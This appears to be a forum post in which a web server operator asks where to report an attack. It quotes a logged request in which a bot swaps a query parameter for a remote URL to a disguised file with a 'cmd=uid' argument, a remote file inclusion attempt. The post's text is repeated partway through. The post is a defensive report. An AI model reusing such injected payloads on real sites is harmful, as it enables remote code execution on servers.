S
Smithers
My question: is there some sort of authority I can report this to? If so,
who? I have a URL directly to a virus-infected file that's getting spread
around on the Internet.
My situation is this: I have a Web server (hosted at a commercial data
center) that faces the public Internet. One of my customer's Web sites has
recently been the subject of some sort of attack - I'm not sure how to
categorize it. The attacker (apparently a spider named lwp-trivial)
substitutes a URL to an otherwise valid query string, then submits the
request. The following is from my centralized error logging routine that
logs all exceptions not otherwise handled:
<RawURL>/udp/UDP_01.aspx?memberID=http://www.DOMAINNAME/smarty/templates/manager/.xpl/FILENAME.jpg?&amp;cmd=uid</RawURL>
<UserAgent>lwp-trivial/1.40</UserAgent>
NOTE: Everything in the RawURL is legitimate up to and including "memberID="
After that, it's whatever the bot substituted in place of legit values.
I have changed the real domain name and file name in the above request for
purposes of posting here.
I entered the above bot-injected URL directly into my browser and
immediately Norton AV detected a virus.
Thanks.
who? I have a URL directly to a virus-infected file that's getting spread
around on the Internet.
My situation is this: I have a Web server (hosted at a commercial data
center) that faces the public Internet. One of my customer's Web sites has
recently been the subject of some sort of attack - I'm not sure how to
categorize it. The attacker (apparently a spider named lwp-trivial)
substitutes a URL to an otherwise valid query string, then submits the
request. The following is from my centralized error logging routine that
logs all exceptions not otherwise handled:
<RawURL>/udp/UDP_01.aspx?memberID=http://www.DOMAINNAME/smarty/templates/manager/.xpl/FILENAME.jpg?&amp;cmd=uid</RawURL>
<UserAgent>lwp-trivial/1.40</UserAgent>
NOTE: Everything in the RawURL is legitimate up to and including "memberID="
After that, it's whatever the bot substituted in place of legit values.
I have changed the real domain name and file name in the above request for
purposes of posting here.
I entered the above bot-injected URL directly into my browser and
immediately Norton AV detected a virus.
Thanks.